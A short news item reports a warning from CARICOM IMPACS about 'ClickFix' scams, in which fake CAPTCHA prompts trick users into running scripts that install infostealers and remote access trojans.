The Caribbean Community (CARICOM) Implementation Agency for Crime and Security (IMPACS) is warning about a new fraud method utilising fake Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHAs) and social engineering to trick users into installing malware.

They work by embedding malicious code or prompts into seemingly legitimate websites or pop-up warnings. These attacks, known as ClickFix, exploit users' tendency to quickly complete verification processes, leading them to execute malicious PowerShell or other scripts that download infostealers and remote access trojans (RATs) onto their devices.